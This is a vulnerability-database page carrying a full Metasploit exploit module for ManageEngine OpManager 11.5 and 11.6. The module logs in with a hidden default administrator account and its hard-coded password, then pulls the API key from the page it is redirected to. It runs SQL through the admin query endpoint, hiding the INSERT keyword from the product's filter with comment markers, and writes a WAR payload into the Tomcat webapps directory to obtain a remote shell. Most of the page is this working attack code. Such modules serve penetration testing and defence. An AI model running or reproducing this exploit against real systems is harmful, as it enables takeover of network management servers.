Vulners
Lucene search
ManageEngine OpManager - Remote Code Execution (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# It removes large object in database, shoudn't be a problem, but just in case....
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine OpManager Remote Code Execution',
'Description' => %q{
This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload. This
module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
[ 'EDB', '38174' ],
],
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ManageEngine OpManager v11.6', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 14 2015',
'DefaultTarget' => 0))
end
def uri
target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'LoginPage.do')
})
unless res && res.code == 200
return Exploit::CheckCode::Safe
end
if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
version = $1
if Gem::Version.new(version) <= Gem::Version.new('11.6')
return Exploit::CheckCode::Appears
else
# Patch unknown
return Exploit::CheckCode::Detected
end
elsif res.body =~ /OpManager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def sql_query( key, query )
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
'vars_get' => { 'apiKey' => key },
'vars_post' => { 'query' => query }
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
end
res
end
def exploit
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'jsp', 'Login.do'),
'vars_post' => {
'domainName' => 'NULL',
'authType' => 'localUserLogin',
'userName' => 'IntegrationUser', # Hidden user
'password' => 'plugin' # Password of hidden user
}
})
if res && res.code == 302
redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => redirect,
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
api_key = $1
print_status("#{peer} - Retrieved API key [ #{api_key} ]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
end
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
print_status("#{peer} - Executing SQL queries")
# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(api_key, sql)
if result.body =~ /lo_create":([0-9]+)}/
lo_id = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end
# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
sql_query(api_key, sql)
# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
sql_query(api_key, sql)
# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
register_file_for_cleanup("tomcat//webapps//#{app_base}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Sep 2015 00:00Current
7.4High risk
Vulners AI Score7.4